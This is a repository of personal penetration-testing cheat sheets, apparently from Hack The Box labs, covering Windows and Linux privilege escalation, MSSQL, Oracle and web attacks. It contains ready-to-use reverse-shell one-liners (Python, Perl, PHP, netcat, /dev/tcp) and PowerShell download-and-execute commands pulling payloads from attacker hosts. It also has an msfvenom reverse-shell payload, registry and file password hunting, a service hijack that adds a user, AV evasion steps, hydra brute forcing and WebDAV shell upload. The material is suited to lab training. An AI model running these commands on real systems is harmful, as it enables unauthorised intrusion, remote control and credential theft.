├── README.md ├── databases ├── mssql.md └── oracle.md ├── metasploit └── msfvenom.md ├── operating_systems ├── attacking-linux.md └── attacking-windows.md ├── shells └── shells.md └── web ├── attacking-web.md ├── cold-fusion.md ├── sharepoint.md └── webdav.md /README.md: -------------------------------------------------------------------------------- 1 | # netsec-docs 2 | Various security related docs 3 | 4 | ## Contents 5 | 6 | - [Operating Systems](./operating_systems) 7 | - [Attacking Windows](./operating_systems/attacking-windows.md) 8 | - [Attacking Linux](./operating_systems/attacking-linux.md) 9 | 10 | -------------------------------------------------------------------------------- /databases/mssql.md: -------------------------------------------------------------------------------- 1 | # MSSQL 2 | 3 | ## XP Command Shell 4 | 5 | - execute command 6 | ``` 7 | xp_cmdshell 'whoami' 8 | ``` 9 | 10 | - enable xp_cmdshell 11 | ``` 12 | EXEC SP_CONFIGURE 'xp_cmdshell',1 13 | reconfigure 14 | ``` 15 | 16 | - install xp_cmdshell 17 | ``` 18 | EXEC SP_CONFIGURE 'show advanced options',1 19 | reconfigure 20 | ``` 21 | 22 | - revshell (limit of 128 chars) 23 | ``` 24 | xp_cmdshell "powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')" 25 | ``` 26 | -------------------------------------------------------------------------------- /databases/oracle.md: -------------------------------------------------------------------------------- 1 | # Oracle DBs 2 | 3 | ## Table of Contents 4 | 5 | ## sidguess 6 | 7 | ``` 8 | sidguess -i X.X.X.X -d ~/wordlist/alpha5 9 | ``` 10 | 11 | ## oracle_login 12 | 13 | ``` 14 | msfconsole 15 | use auxiliary/admin/oracle/oracle_login 16 | set SID xe 17 | set rhost X.X.X.X 18 | exploit 19 | ``` 20 | 21 | ## odat 22 | 23 | * gitlab clone: `https://gitlab.com/nmatt0/odat` 24 | * improved Dockerfile: XXX 25 | 26 | ``` 27 | sudo docker build -t odat . 28 | sudo docker run -i -t odat 29 | # TNSPOISON 30 | sudo docker run -i -t -p1522:1522 odat 31 | ``` 32 | 33 | ### TNSPOISON via odat 34 | 35 | ``` 36 | ./odat.py tnspoison -s 10.10.10.82 -d xe --poison 37 | ``` 38 | -------------------------------------------------------------------------------- /metasploit/msfvenom.md: -------------------------------------------------------------------------------- 1 | # msfvenom 2 | 3 | ## Windows Powershell Reverse TCP EXE 4 | ``` 5 | msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe > shell.exe 6 | ``` 7 | -------------------------------------------------------------------------------- /operating_systems/attacking-linux.md: -------------------------------------------------------------------------------- 1 | # attacking linux 2 | 3 | ## Privilege Escalation 4 | 5 | ### Commands 6 | 7 | - list suid programs 8 | ``` 9 | find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null >suidfiles.txt 10 | ``` 11 | 12 | - list suid programs owned by root 13 | ``` 14 | find / -type f -user root \( -perm -4000 -o -perm -2000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt 15 | ``` 16 | 17 | - list world writeable files in /etc 18 | ``` 19 | find /etc/ -type f -perm -o=w 20 | ``` 21 | 22 | - list world writeable files in /var 23 | ``` 24 | find /var/ -type f -perm -o=w 25 | ``` 26 | 27 | - list log files that are world readable 28 | ``` 29 | find /var/log/ -type f -perm -o=r 30 | ``` 31 | 32 | 33 | ### Enumeration Scripts 34 | 35 | - LinEnum 36 | - https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh 37 | - https://github.com/rebootuser/LinEnum 38 | 39 | - linuxprivchecker 40 | - https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py 41 | - https://github.com/sleventyeleven/linuxprivchecker 42 | 43 | ### search for capabilities 44 | - using `getcap` 45 | - you might have to copy this binary onto the system. 46 | - you actually don't need to be a privileged user to read capabilies from a file's xattrs. 47 | - `getcap -r /` 48 | 49 | ### Kernel Exploits 50 | 51 | - https://github.com/lucyoa/kernel-exploits 52 | -------------------------------------------------------------------------------- /operating_systems/attacking-windows.md: -------------------------------------------------------------------------------- 1 | # Attacking Windows 2 | 3 | ## Table of Contents 4 | 5 | * [Windows Basics](#windows-basics) 6 | * [Windows Access Control](#windows-access-control) 7 | * [Windows Integrity Levels](#windows-integrity-levels) 8 | * [Common Tools](#common-tools) 9 | * [Local Privilege Escalation Methods](#local-privilege-escalation-methods) 10 | * [Pivot to a less secure box](#pivot-to-a-less-secure-box) 11 | * [Enumerate missing patches](#enumerate-missing-patches) 12 | * [Clear Text Passwords](#clear-text-passwords) 13 | * [Passwords in Registry](#passwords-in-registry) 14 | * [GUI Attacks](#gui-attacks) 15 | * [Shatter Attacks](#shatter-attacks) 16 | * [File and Directory Permissions](#file-and-directory-permissions) 17 | * [Enumerate Auto Runs](#enumerate-auto-runs) 18 | * [Application DLL Searching](#application-dll-searching) 19 | * [Tasks and Jobs](#tasks-and-jobs) 20 | * [Services](#services) 21 | * [Other Permission Issues](#other-permission-issues) 22 | * [Token Impersonation](#token-impersonation) 23 | * [Local Admin to Domain Account](#local-admin-to-domain-account) 24 | * [Sources](#sources) 25 | 26 | ## Windows Basics 27 | 28 | ### Windows Access Control 29 | 30 | - securable objects 31 | - files 32 | - directories 33 | - services 34 | - registry keys 35 | - named pipes 36 | - security descriptor 37 | - discretionary access control list (DACL) 38 | - access control entries (ACE) 39 | - access token 40 | - container of user security info 41 | - SID, groups, privileges 42 | - tied to process or thread 43 | 44 | #### Windows Integrity Levels 45 | | Name | Level | Use | 46 | |:---:|:---:|:---:| 47 | | Untrusted | 0 | Used by processes started by the Anonymous group. Blocks most write access. | 48 | | Low | 1 | Used by Protected Mode Internet Explorer; blocks write access to most objects (such as files and regisry keys) on the system. | 49 | | Medium | 2 | Used by normal applications being launched while UAC is enabled. | 50 | | High | 3 | Used by administrative applications launched thought elevation when UAC is enabled, or normal applications if UAC is disabled and the user is an administrator. | 51 | | System | 4 | Used by services and other system-level applications (such as Wininit, Winlogon, Smss, etc.) | 52 | 53 | - In a privilege escalation situation, we are usually trying to move from Medium to High. 54 | - It is trivial to move from High to System. 55 | - meterpreter: getsystem 56 | - sticky keys exploit 57 | 58 | **Remember: UAC is an annoyance, but NEVER a security boundary!** 59 | 60 | ## Common Tools 61 | 62 | - eternal blue scanner 63 | - https://github.com/peterpt/eternal_scanner 64 | 65 | - impacket 66 | - https://github.com/CoreSecurity/impacket 67 | - contains tools such as psexec 68 | - check out example programs that use Impacket 69 | - https://github.com/CoreSecurity/impacket/tree/master/examples 70 | - smbserver 71 | - host a local smb server that you can use to push/pull files to/from the target system 72 | - e.g. `sudo smbserver.py sharename /var/www` 73 | 74 | - Sherlock 75 | - https://github.com/rasta-mouse/Sherlock 76 | - Checks for windows priv esc vulns 77 | - download: `IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Sherlock.ps1')` 78 | - execute: `Find-AllVulns` 79 | 80 | - Empire 81 | - https://github.com/EmpireProject/Empire 82 | - Empire is a PowerShell and Python post-exploitation agent. 83 | - exploits: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc 84 | 85 | - Windows-Exploit-Suggester 86 | - https://github.com/GDSSecurity/Windows-Exploit-Suggester 87 | - great for older, non-powershell, systems (xp/2003) where you can't use Sherlock 88 | - all you have to do is run `systeminfo` on the target machine and copy the output 89 | - e.g. `./windows-exploit-suggester.py -i ~/ctf/hackthebox/arctic/systeminfo.txt -d 2018-08-04-mssb.xls` 90 | 91 | - Nishang 92 | - https://github.com/samratashok/nishang 93 | - Windows Rev Shells and other stuff 94 | - cmd: `c:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1')` 95 | 96 | - PowerSploit 97 | - https://github.com/PowerShellMafia/PowerSploit 98 | - PowerUp.ps1 99 | - https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 100 | - Privesc Tool 101 | - IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/PowerUp.ps1') 102 | - run all checks: `Invoke-AllChecks` 103 | 104 | - PowerView (Subset of PowerSploit) 105 | - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 106 | - Useful Functions: 107 | - `Get-NetUser` 108 | - `Get-NetGroup` 109 | - `Get-NetComputer` 110 | - All Functions: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon 111 | 112 | - JAWS (Just Another Windows (Enum) Script) 113 | - https://github.com/411Hall/JAWS 114 | - https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 115 | 116 | ### PowerShell 117 | 118 | - view processes: `tasklist` 119 | 120 | - direct execute script from internet: `IEX(New-Object Net.WebClient).downloadString('http://example.com/blah.ps1')` 121 | 122 | - download file (powershell 2): 123 | ``` 124 | $WebClient = New-Object System.Net.WebClient 125 | $WebClient.DownloadFile("https://www.example.com/file","C:\path\file") 126 | ``` 127 | 128 | - download file (powershell 3+): `Invoke-WebRequest -Uri $url -OutFile $output` 129 | 130 | - execute the thing ???: `Invoke-AllChecks` 131 | 132 | - check if system is 64bit: `[environment]::Is64BitOperatingSystem` 133 | 134 | - check if current process is 64bit: `[environment]::Is64BitProcess` 135 | 136 | - 64bit powershell: `c:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe` 137 | 138 | - get my privs: `whoami /all` 139 | 140 | - get autologon info: `Get-RegistryAutoLogin` 141 | 142 | - get basic system info: `systeminfo` 143 | 144 | ## Exploits 145 | 146 | - MS16-135 147 | - https://github.com/FuzzySecurity/PSKernel-Primitives/blob/master/Sample-Exploits/MS16-135/MS16-135.ps1 148 | 149 | - MS16-032 150 | - https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1 151 | - useage: Invoke-MS16032 -Command "IEX(New-Object Net.WebClient).downloadString('http://example.com/blah.ps1')" 152 | 153 | ## Kerberoasting 154 | 155 | - https://www.blackhillsinfosec.com/a-toast-to-kerberoast/ 156 | - Essentially, when a domain account is configured to run a service in the environment, such as MS SQL, a Service Principal Name (SPN) is used in the domain to associate the service with a login account. When a user wishes to use the specific resource they receive a Kerberos ticket signed with NTLM hash of the account that is running the service. 157 | - Impacket has a tool: GetUserSPNs.py 158 | - GetUserSPNs.py -request -dc-ip IP DOMAIN/USER:PASSWORD` 159 | 160 | ## AV evasion 161 | 162 | ### Ebowla 163 | 164 | - https://github.com/Genetic-Malware/Ebowla.git 165 | 1. edit `genetic.config` 166 | - output_type = go 167 | - payload_type = exe 168 | - edit environmental vars to match target system 169 | 2. run ebowla 170 | - e.g. `./ebowla.py ~/storage/revshell.exe genetic.config` 171 | 3. build binary using go cross compiling script 172 | - e.g. `./build_x64_go.sh output/go_symmetric_10_10_14_6-5555-revshell.exe.go enc-10_10_14_6-5555-revshell.exe` 173 | 174 | 175 | ## Local Privilege Escalation Methods 176 | 177 | ## Rotten Potato 178 | 179 | - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ 180 | - https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/ 181 | - https://github.com/breenmachine/RottenPotatoNG 182 | - https://decoder.cloud/2018/01/13/potato-and-tokens/ 183 | - poc: https://github.com/decoder-it/lonelypotato 184 | - USE THIS ONE 185 | - use `windows/x64/shell_reverse_tcp` not `windows/x64/powershell_reverse_tcp` for some reason it doesn't work 186 | 187 | ### Pivot to a Less Secure Machine 188 | 189 | - psexec laterally with the compromised user 190 | - powerview 191 | - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 192 | - This will query the AD server for local admin access with the current user. 193 | - launching powerview: 194 | ``` 195 | powershell -exec bypass 196 | import-module .\powerview.ps1 197 | Find-LocalAdminAccess 198 | ``` 199 | 200 | ### Enumerate Missing Patches 201 | 202 | - metasploit modules 203 | ``` 204 | post/windows/gather/enum_patches 205 | post/multi/recon/local_exploit_suggester 206 | ``` 207 | 208 | ### Clear Text Passwords 209 | 210 | - unattended install script 211 | ``` 212 | c:\unattend.txt 213 | ``` 214 | 215 | - sysprep 216 | ``` 217 | c:\sysprep.inf 218 | c:\sysprep\sysprep.xml 219 | ``` 220 | 221 | - search system for keywords 222 | ``` 223 | findstr /si password *.txt | *.xml | *.ini 224 | dir /b /s web.config 225 | dir /b /s unattend.xml 226 | dir /b /s sysprep.inf 227 | dir /b /s sysprep.xml 228 | dir /b /s *pass* 229 | ``` 230 | 231 | - VNC 232 | ``` 233 | dir /b /s vnc.ini 234 | dir /b /s ultravnc.ini 235 | 236 | ``` 237 | 238 | - FTP or other remote access clients 239 | - cached creds 240 | - GPP 241 | ``` 242 | \\1.2.3.4\SYSVOL\???? 243 | ``` 244 | - decrypt password: gpp-decrypt ruby tool 245 | 246 | ### Passwords in Registry 247 | 248 | - VNC 249 | ``` 250 | reg query "HKCU\Software\ORL\WinVNC3\Password" 251 | ``` 252 | 253 | - autologin 254 | ``` 255 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogin" 256 | ``` 257 | 258 | - SNMP parameters 259 | ``` 260 | reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP\" 261 | ``` 262 | 263 | - putty 264 | ``` 265 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 266 | ``` 267 | 268 | - general search for interesting registy settings 269 | ``` 270 | reg query HKLM /f password /t REG_SZ /s 271 | reg query HKCU /f password /t REG_SZ /s 272 | # for citrix, copy results to clipboard 273 | reg query HKLM /f password /t REG_SZ /s | clip 274 | reg query HKCU /f password /t REG_SZ /s | clip 275 | ``` 276 | 277 | ### GUI Attacks 278 | 279 | windows XP/2003 280 | - check for GUI apps running with elevated privileges 281 | - get a file dialog and navigate to cmd.exe 282 | 283 | ### Shatter Attacks 284 | 285 | windows XP/2003 286 | - anything running as SYSTEM with a windows can be attacked from the command line 287 | - things to look for: 288 | - Listview/Treeview 289 | - RichTextBox 290 | - EditBox 291 | 292 | ### File and Directory Permissions 293 | 294 | - checking directory permissions 295 | - `cacls "c:\Program Files"` 296 | - Looking for "Everyone: (OI)(CI)F" 297 | - check if you can overwrite key system programs 298 | 299 | - checking file permissions 300 | - `this is a sysinternals tool` 301 | - `accesschk.exe -qwv c:\test.txt` 302 | - suggested queries: 303 | ``` 304 | accesschk.exe -qwsu "Authenticated Users" c:\ 305 | accesschk.exe -qwsu "Users" c:\ 306 | accesschk.exe -qwsu "Everyone" c:\ 307 | ``` 308 | 309 | - user created directory permisssions 310 | - by default new directories are able to be written to by everyone on the system 311 | 312 | ### Enumerate Auto Runs 313 | 314 | - autoruns 315 | - sysinternals tool 316 | - procmon 317 | - sysinternals tool 318 | - look at what DLLs a program is loading 319 | - trojan the DLL with msfvenom 320 | 321 | ### Application DLL Searching 322 | - check order in which DLLs are loaded from which directories 323 | 324 | ### Tasks and Jobs 325 | 326 | - system tasks 327 | - AT - usually runs tasks as system 328 | - scheduled tasks - can run as user 329 | 330 | - viewing tasks 331 | ``` 332 | c:\windows\tasks 333 | c:\windows\system32\tasks 334 | ``` 335 | - commands 336 | ``` 337 | AT 338 | schtasks 339 | compmgmt.msc 340 | ``` 341 | 342 | ### Services 343 | 344 | - Orphaned Installs 345 | - Missing files in writable locations 346 | 347 | - AccessChk 348 | - Sysinternals tool 349 | - Find weak permissions 350 | - `accesschk.exe -uwcqv *` 351 | - dangurous permissions: 352 | - `SERVICE_CHANGE_CONFIG` 353 | - `WRITE_DAC` 354 | - `WRITE_OWNER` 355 | - `GENERIC_WRITE` 356 | - `GENERIC_ALL` 357 | - `SERVICE_ALL_ACCESS` 358 | - suggested queries: 359 | ``` 360 | accesschk.exe -qwcu "Authenticated Users" * 361 | accesschk.exe -qwcu "Users" * 362 | accesschk.exe -qwcu "Everyone" * 363 | ``` 364 | 365 | - Service control 366 | - `sc.exe` 367 | - native windows cmd tool 368 | - e.g. `sc qc upnphost` 369 | - If you can reconfigure a service: 370 | ``` 371 | sc config upnphost binpath= "net user hax /add" 372 | sc config upnphost obj= ".\LocalSystem" password="" 373 | net stop upnphost 374 | net start upnphost 375 | ``` 376 | 377 | ### Other Permission Issues 378 | 379 | - Read and Write sensitive keys 380 | - MS11-011 381 | - MS10-059 382 | - MS10-021 383 | 384 | ### Token Impersonation 385 | 386 | - This is the ability of a thread to execute using a different security token 387 | - Reading 388 | - Cesar Cerrudo - Token Kidnapping 1/2/3 389 | - MWR InfoSecurity - Whitepaper 390 | - Has potential to get System from a local IIS account 391 | - Look for process with the SeImpersonate permission 392 | 393 | ### Local Admin to Domain Account 394 | 395 | - Incognito 396 | - Luke Jennings 397 | - Standalone or Metasploit 398 | - Finds usable delegation tokens 399 | - Impersonate 400 | - Snarf anyone's token from running process 401 | - Process Injection 402 | - Administrator can hijack and users process 403 | - WCE 404 | - http://www.ampliasecurity.com/research.html 405 | - Improved "Pass the Hash" 406 | - Retrieves hashes from LSASS 407 | - Modifies in memory current user hashes 408 | - Mimicatz 409 | 410 | ### Rev Shell TTY Issues 411 | 412 | - FuzzySecurity/PowerShell-Suite 413 | - Invoke-Runas 414 | 415 | ## Sources 416 | - [Encyclopaedia Of Windows Privilege Escalation - Brett Moore](https://www.youtube.com/watch?v=kMG8IsCohHA) 417 | - [Level Up! Practical Windows Privilege Escalation - Andrew Smith](https://www.youtube.com/watch?v=PC_iMqiuIRQ) 418 | -------------------------------------------------------------------------------- /shells/shells.md: -------------------------------------------------------------------------------- 1 | # Shells 2 | 3 | ## Table of Contents 4 | 5 | ## Web Shells 6 | 7 | ### Tennc Webshell Collection 8 | 9 | This is a massive collections of webshells 10 | - https://github.com/tennc/webshell 11 | 12 | - PHP 13 | - [c99](https://github.com/tennc/webshell/blob/master/php/PHPshell/c99/c99.php) 14 | - simple: `` 15 | - ASP 16 | - [ASP Webshell](https://github.com/tennc/webshell/blob/master/asp/webshell.asp) 17 | 18 | ## Reverse Shell 19 | 20 | ### Catch Reverse Shell 21 | 22 | - netcat listener for receieving reverse shell 23 | ``` 24 | nc -nvlp 1234 25 | ``` 26 | 27 | ### Throw Reverse Shell 28 | 29 | - python reverse shell 30 | ``` 31 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("myip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 32 | ``` 33 | 34 | - perl reverse shell 35 | ``` 36 | perl -e 'use Socket;$i="myip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 37 | ``` 38 | 39 | - php reverse shell 40 | ``` 41 | php -r '$sock=fsockopen("myip",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 42 | ``` 43 | 44 | - basic netcat reverse shell (GNU netcat) 45 | ``` 46 | nc -c /bin/bash 1234 47 | ``` 48 | 49 | - basic netcat reverse shell (BSD netcat) 50 | ``` 51 | /bin/sh -i 2>&1 | nc myip 1234 52 | ``` 53 | 54 | - /dev/tcp reverse shell 55 | ``` 56 | /bin/bash -i > /dev/tcp/myip/1234 0<&1 2>&1 57 | # or without bash assumptions 58 | exec 5<>/dev/tcp/myip/1234; cat <&5 | while read line; do $line 2>&5 >&5; done 59 | ``` 60 | 61 | - ubuntu reverse shell using telnet 62 | ``` 63 | rm /tmp/backpipe; mknod /tmp/backpipe p && telnet myip 1234 0/tmp/backpipe 64 | ``` 65 | 66 | - reverse shell for when the shell closes right away 67 | ``` 68 | #listen on port 1234 and 1235 69 | telnet myip 1234 | /bin/bash 2>&1 | telnet myip 1235 70 | #issue commands in 1234 shell and get response in 12345 shell 71 | #or with nc 72 | nc myip 1234 | sh 2>&1 | nc myip 1235 73 | ``` 74 | ## Shell Utils 75 | 76 | - get a tty from within a reverse shell 77 | ``` 78 | python -c 'import pty; pty.spawn("/bin/sh")' 79 | ``` 80 | 81 | - improve the shell! 82 | ``` 83 | python -c 'import pty; pty.spawn("/bin/bash")' 84 | CTRL-Z 85 | stty -a | head -n1 86 | stty raw -echo 87 | fg 88 | export HOME=/root 89 | export SHELL=/bin/bash 90 | export TERM=xterm-256color 91 | stty rows X columns Y 92 | ``` 93 | - source: https://nullsec.us/fixing-a-raw-shell/ 94 | 95 | ## Command Injection Utils 96 | 97 | ### Command Injection Without Spaces 98 | - http://www.betterhacker.com/2016/10/command-injection-without-spaces.html 99 | -------------------------------------------------------------------------------- /web/attacking-web.md: -------------------------------------------------------------------------------- 1 | # attacking web 2 | 3 | ## FastCGI 4 | 5 | - https://github.com/adoy/PHP-FastCGI-Client 6 | - use client to execute php script: `./fcgiget.php localhost:9000/tmp/exp.php` 7 | 8 | ## HTTP login forms 9 | 10 | ### hydra 11 | ``` 12 | hydra -l username -P wordlist ip/hostname http-form-post "/login.php:uname=^USER^&passwd=^PASS^&Submit=Login:error-text 13 | e.g. 14 | hydra -l harvey -P ~/wordlist/10k.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&Submit=Login:Invalid Username or Password" 15 | ``` 16 | -------------------------------------------------------------------------------- /web/cold-fusion.md: -------------------------------------------------------------------------------- 1 | # attacking cold fusion 2 | 3 | ## Things to Look For 4 | 5 | - http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf 6 | - `/CFIDE/componentutils/componentlist.cfm` 7 | - `/CFIDE/adminapi/administrator.cfc?method=getSalt` 8 | - get CF version: `/CFIDE/adminapi/base.cfc?wsdl` 9 | - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/coldfusion_fckeditor.rb 10 | -------------------------------------------------------------------------------- /web/sharepoint.md: -------------------------------------------------------------------------------- 1 | # Sharepoint 2 | 3 | ## Table of Contents 4 | 5 | ## Common Paths 6 | 7 | - `/_layouts/viewlsts.aspx` 8 | - `/_layouts/15/viewlsts.aspx` 9 | - `/Shared%20Documents/Forms/AllItems.aspx` 10 | - `/_layouts/15/start.aspx#/SitePages/Forms/AllPages.aspx` 11 | 12 | see wordlist: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/sharepoint.txt 13 | 14 | -------------------------------------------------------------------------------- /web/webdav.md: -------------------------------------------------------------------------------- 1 | # webdav 2 | 3 | ## davtest 4 | 5 | - test url for webdav: `davtest -url http://10.10.10.15` 6 | 7 | ## curl 8 | 9 | - upload: `curl -v -T shell.html http://10.10.10.15/shell.html` 10 | 11 | - move: `curl -v -X MOVE --header 'Destination:http://10.10.10.15/shell.aspx' http://10.10.10.15/shell.html` 12 | 13 | 14 | --------------------------------------------------------------------------------